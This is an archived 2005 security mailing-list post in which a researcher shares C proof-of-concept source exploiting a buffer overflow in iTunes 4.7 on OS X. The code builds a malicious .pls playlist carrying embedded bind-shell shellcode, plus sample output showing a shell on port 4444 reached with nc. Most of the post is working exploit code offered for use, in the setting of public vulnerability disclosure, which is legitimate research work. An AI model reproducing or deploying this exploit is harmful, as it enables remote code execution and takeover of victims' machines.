Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security VulnWatch
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

iDefense iTunes advisory.

from [nemo] Network Security [Permanent Link]
Subject: iDefense iTunes advisory.
Date: Sat, 15 Jan 2005 07:28:43 -0800 
Hey Everyone,

I've written a proof of concept for the iTunes 4.7 advisory released by 
iDefense 
on January 13, 2005.

Here is some code to exploit the vulnerability, it will generate a *.pls file 
which,when opened with iTunes 4.7 will bind a shell on port 4444.

- nemo

<------------------ fm-eyetewnz.c -------------------------->

/*
 * PoC for iTunes on OS X 10.3.7 
 * -( nemo@felinemenace.org )-
 * 
 * Generates a .pls file, when loaded in iTunes it 
 * binds a shell to port 4444. 
 * Shellcode contains no \x00 or \x0a's.
 *
 * sample output:
 *
 * -[nemo@gir:~]$ ./fm-eyetewnz foo.pls
 * -( fm-eyetewnz )-
 * -( nemo@felinemenace.org )-
 * Creating file: foo.pls.
 * Bindshell on port: 4444
 * -[nemo@gir:~]$  open foo.pls
 * -[nemo@gir:~]$  nc localhost 4444
 * id
 * uid=501(nemo) gid=501(nemo) groups=501(nemo)
 * 
 * Thanks to andrewg, mercy and core.
 * Greetings to pulltheplug and felinemenace.
 *
 * -( need a challenge? )-
 * -( http://pulltheplug.org )-
 */

#include <stdio.h>
#include <strings.h>

#define BUFSIZE 1598 + 4

char shellcode[] = /* large ugly shellcode generated by http://metasploit.com */
"\x7c\xa5\x2a\x79\x40\x82\xff\xfd\x7f\xe8\x02\xa6\x3b\xff\x07\xfa"
"\x38\xa5\xf8\x4a\x3c\xc0\xee\x83\x60\xc6\xb7\xfb\x38\x85\x07\xee"
"\x7c\x89\x03\xa6\x80\x9f\xf8\x4a\x7c\x84\x32\x78\x90\x9f\xf8\x4a"
"\x7c\x05\xf8\xac\x7c\xff\x04\xac\x7c\x05\xff\xac\x3b\xc5\x07\xba"
"\x7f\xff\xf2\x15\x42\x20\xff\xe0\x4c\xff\x01\x2c\xd6\xe3\xb7\xf9"
"\xd6\x03\xb7\xfa\xd6\x23\xb7\xfd\xd6\x83\xb7\x9a\xaa\x83\xb7\xf9"
"\x92\x83\xb5\x83\x92\xfd\xac\x83\xa6\x83\xb7\xf6\xee\x81\xa6\xa7"
"\xee\x83\xb7\xfb\x92\x0b\xb5\x5d\xd6\x23\xb7\xeb\xd6\x83\xb7\x93"
"\x91\x40\x44\x83\xaa\x83\xb7\xf9\x92\x83\xb5\x83\xd6\x83\xb7\x91"
"\x91\x40\x44\x83\xaa\x83\xb7\xf9\x92\x83\xb5\x83\x91\x40\x44\x83"
"\xd6\x83\xb7\xe5\xd6\x03\xb7\xeb\x7e\x02\x48\x13\xd6\x22\x48\x13"
"\xd6\x02\x48\x0b\xaa\x83\xb7\xf9\x92\x83\xb5\x83\x92\xfd\xac\x83"
"\xd6\x23\xb7\xf9\xd6\x83\xb7\xa1\x91\x40\x44\x83\x92\x27\x9c\x83"
"\xaa\x83\xb7\xf9\x92\x83\xb5\x83\xd6\x26\x48\x04\xc2\x86\x48\x04"
"\xae\x01\x48\x1e\xd6\x83\xb7\xb9\xaa\x83\xb7\xf9\x92\x83\xb5\x83"
"\x92\x26\x9d\x82\xae\x01\x48\x06\x92\xeb\xb5\x5d\xd6\xe0\xb7\xd3"
"\x7e\xe2\x48\x03\x7e\x22\x48\x07\xd6\x02\x48\x03\xd6\x83\xb7\xc0"
"\x92\x83\xb3\x57\xaa\x83\xb7\xf9\x92\x83\xb5\x83\x91\x63\xb7\xf3"
"\xc1\xe1\xde\x95\xc1\xe0\xc4\x93\xee\x83\xb7\xfb";

int main(int ac, char **av)
{
        int n,*p;
        unsigned char * q;
        char buf[BUFSIZE];
        FILE *pls;
        int offset=0x3DA8;
        char playlist[] = { 
                "[playlist]\n"                                                  
  
                "NumberOfEntries=1\n"                                           
  
                "File1=http://";
        };
        printf("-( fm-eyetewnz )-\n");
        printf("-( nemo@felinemenace.org )-\n");
        memset(buf,'\x60',BUFSIZE);
        bcopy(shellcode, buf + (BUFSIZE - 44 - 
sizeof(shellcode)),sizeof(shellcode) - 1); // avoid mangled stack.
        q = buf + sizeof(buf) - 5;
        p = (int *)q; 
        if(!(av[1])) {
                printf("usage: %s <filename (.pls)> [offset]\n",*av);
                exit(1);
        }
        if(av[2])
                offset = atoi(av[2]);
        *p = (0xc0000000 - offset);//    0xbfffc258;
        if(!(pls = fopen(*(av+1),"w+"))) {
                printf("error opening file: %s.\n", *(av +1));
                exit(1);
        }
        printf("Creating file: %s.\n",*(av+1));
        printf("Bindshell on port: 4444\n");
        fwrite(playlist,sizeof(playlist) - 1,1,pls);    
        fwrite(buf,sizeof(buf) - 1,1,pls);      
        fclose(pls);
}
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • iDefense iTunes advisory., nemo <=
Previous by Date:  Re: [Full-Disclosure] Multi-vendor AV gateway image inspection bypass vulnerability, Trog
Next by Date:  [VulnWatch] iDEFENSE Security Advisory 01.17.05: Multiple Vendor ImageMagick .psd Image File Decode Heap Overflow Vulnerability, customer service mailbox
Previous by Thread:  Re: [Full-Disclosure] Multi-vendor AV gateway image inspection bypass vulnerability, Trog
Next by Thread:  [VulnWatch] iDEFENSE Security Advisory 01.17.05: Multiple Vendor ImageMagick .psd Image File Decode Heap Overflow Vulnerability, customer service mailbox
Indexes:  [Date] [Thread] [Top] [All Lists]